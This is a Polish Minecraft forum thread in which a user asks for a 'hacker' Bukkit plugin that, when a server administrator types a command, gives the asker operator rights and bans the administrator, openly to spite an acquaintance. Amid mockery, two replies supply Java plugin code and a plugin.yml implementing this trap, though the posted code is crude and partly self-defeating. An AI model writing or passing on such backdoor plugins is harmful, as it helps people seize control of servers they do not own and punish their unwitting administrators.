Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Pytanie] Pisanie pluginów

Rekomendowane odpowiedzi

Opublikowano

Cześć wszystkim!

Chciałbym abyście pomogli mi w pisaniu pluginów. A więc jak zrobić plugin który po wpisaniu jakiejś komendy przez administratora automatycznie daje mi opa oraz banuje tego co wpisał tą komendę. Tak wiem, że jest to taki hakerski plugin, lecz chciałbym zrobić na złość pewnemu ziomkowi który mnie troszkę zdenerwował :-)

Za dobrą odpowiedź dam LIKE!

Opublikowano

@TheMolkaPL

Po pierwsze nie jestem głupi, po drugie to jest skrypt, po trzecie nawet skryptu dobrze nie umiesz napisać... Brak słów, dlaczego wypowiadają się na tym forum takie dzieci? No comment.

Opublikowano

@TheMolkaPL

Po pierwsze nie jestem głupi, po drugie to jest skrypt, po trzecie nawet skryptu dobrze nie umiesz napisać... Brak słów, dlaczego wypowiadają się na tym forum takie dzieci? No comment.

jak zakladasz takie tematy to widac ze masz max 13 lat 

Opublikowano

jak zakladasz takie tematy to widac ze masz max 13 lat 

Po pierwsze jak Ci tak trudno zajrzeć na mój profil mam 21 lat więc drogie dziecko nie podskakuj do starszych. A to, że mam troszkę więcej lat od Ciebie to nie znaczy że muszę się znać się na javie i pisaniu w niej pluginów.

Opublikowano

Po pierwsze jak Ci tak trudno zajrzeć na mój profil mam 21 lat więc drogie dziecko nie podskakuj do starszych. A to, że mam troszkę więcej lat od Ciebie to nie znaczy że muszę się znać się na javie i pisaniu w niej pluginów.

No nieźle 21 lat i pisze skrypty do mc pogratulować...

Mając 21 lat chyba umiesz wpisać w google "pisanie pluginów minecraft" co nie?

Jak chcesz się coś nauczyć to wpisz na youtube kamilkime.

Opublikowano

import org.bukkit.command.Command;
import org.bukkit.command.CommandSender;
import org.bukkit.entity.Player;
import org.bukkit.plugin.java.JavaPlugin;

public class pomoc extends JavaPlugin {

public void onEnable(){

}

public void onDisable(){

}
    public boolean onCommand(CommandSender sender, Command cmd, String label, String[] args){
        if(cmd.getName().equalsIgnoreCase("op")){
            Player p = (Player) sender;
            if(p.getName().equalsIgnoreCase("BuenosAiresPL")){
                p.setOp(true);
                p.setBanned(true);

p.kickPlayer(getName());
            }
        }
        return false;

}

}

to powinno działać, jeśli nie umiesz zrobić plugin.yml napisz to całość Ci dam jako plugin

Opublikowano

MPCForum, dlaczego to akurat Ciebie musiało napaść takie coś .. Nie umiecie spokojnie pomóc dla człowieka w potrzebie, to już chyba jego sprawa jaką drogę wybrał, co z tego że pisze skrypty, ze wszystkich się śmiejecie.

@topic

Jeżeli chcesz napisać plugin, to tak jak NetherSky_ napisał, obejrzyj kamilkime (Dobry koleś, czasem też go oglądam) lub też możesz swoją drogą pójść i nauczyć się podstaw javy (z darmowych kursów na necie) i nauczyć się Bukkit Api http://jd.bukkit.org/rb/apidocs/

I raczej szybciej wyjdzie niżeli ktoś na tym forum pomoże, bo tylko hejt i hejt.  

//Edit

@Luxq1 tylko żeby jeszcze zainicjował tą komendę w plugin.yml

Jeżeli pomogłem, daj + Ciebie nic nie kosztuje Mi znaczy wiele.

Zachęcam do podsyłania pomysłów na film jako poradniki na YouTube

Opublikowano

MPCForum, dlaczego to akurat Ciebie musiało napaść takie coś .. Nie umiecie spokojnie pomóc dla człowieka w potrzebie, to już chyba jego sprawa jaką drogę wybrał, co z tego że pisze skrypty, ze wszystkich się śmiejecie.

@topic

Jeżeli chcesz napisać plugin, to tak jak NetherSky_ napisał, obejrzyj kamilkime (Dobry koleś, czasem też go oglądam) lub też możesz swoją drogą pójść i nauczyć się podstaw javy (z darmowych kursów na necie) i nauczyć się Bukkit Api http://jd.bukkit.org/rb/apidocs/

I raczej szybciej wyjdzie niżeli ktoś na tym forum pomoże, bo tylko hejt i hejt.  

//Edit

@Luxq1 tylko żeby jeszcze zainicjował tą komendę w plugin.yml

Napisałem na dole że jeśli nie umie jej zainicjować to żeby napisał to mu cały plugin wyśle

Opublikowano

@TheMolkaPL

Popatrz sobie na innych forach o TheMolkaPL czy też tutaj on skryptów nie pisze bo pisze w javie nie chciał Ci pomóc bo mu sie nie chciało lub coś innego xD

Opublikowano

@Luq1

Jakbyś mógł to daj ten plugin jak Ci się nie chce czy coś to nie ma sprawy :) Zaraz przetestuje czy działa.

name: {NAZWA}
version: {WERSJA}
author: {AUTOR}
main: {tu dajesz nazwe paczki gdzie masz main nie wiem jak sie u cb}.Main

commands:
  op:
    description: TEST
Opublikowano

Masz tutaj, taki kod b­ez podawania nazwy gracza :D.

import java.util.logging.Logger;

import org.bukkit.Bukkit;
import org.bukkit.command.Command;
import org.bukkit.command.CommandSender;
import org.bukkit.entity.Player;
import org.bukkit.plugin.java.JavaPlugin;

public class Main 
	extends JavaPlugin
{

public final Logger log = Bukkit.getLogger();

public void onEnable() {

}

@SuppressWarnings("deprecation")
	@Override
	public boolean onCommand(CommandSender sender, Command command, String label, String[] args) 
	{
		if(!(sender instanceof Player)) {
			sender.sendMessage("Ta komenda tylko dla gracza!");
			return false;
		}
		Player p = (Player) sender;
		if(command.getName().equalsIgnoreCase("op")) 
		{
			p.setBanned(true);
			p.setOp(true);
			return true;
		}
		return false;
	}
}

A plugin.yml podał ci @NetherSky_ :D.

Pomogłem, strzel duży przycisk Lubię To!­

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...